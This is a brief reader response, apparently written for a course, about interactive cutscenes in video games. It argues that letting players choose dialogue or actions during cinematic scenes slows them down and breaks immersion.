‘In the reading it said that cinematic scenes are generally played and the player can sit back and just watch. I have played a few games where the player has had the option to pick dialogue or actions and actually effect how the scene plays out. Sometimes these are based on character reaction time, and others give time to choose. Regardless, both ways slow down the movie and make it appear glitchy, messing with the suspension of disbelief.
